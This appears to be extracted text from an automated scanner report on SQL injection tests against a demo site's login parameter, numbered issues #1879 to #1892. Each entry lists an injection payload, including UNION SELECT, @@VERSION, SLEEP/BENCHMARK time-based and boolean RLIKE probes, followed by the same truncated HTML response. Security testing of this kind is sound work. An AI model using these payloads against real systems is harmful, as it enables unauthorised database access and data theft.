charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1879\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1880\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1881\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1882\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1883\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1884Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# RLIKE (SELECT (CASE WHEN (4346=4346) THEN \n0x61646d696e ELSE 0x28 END)) AND 'Txws'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1885\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1886\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1887\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+\nCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1888\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1889\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 24--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1890\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# WHERE 1=1 AND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1891\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ||\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1892\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5)\n,3\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" 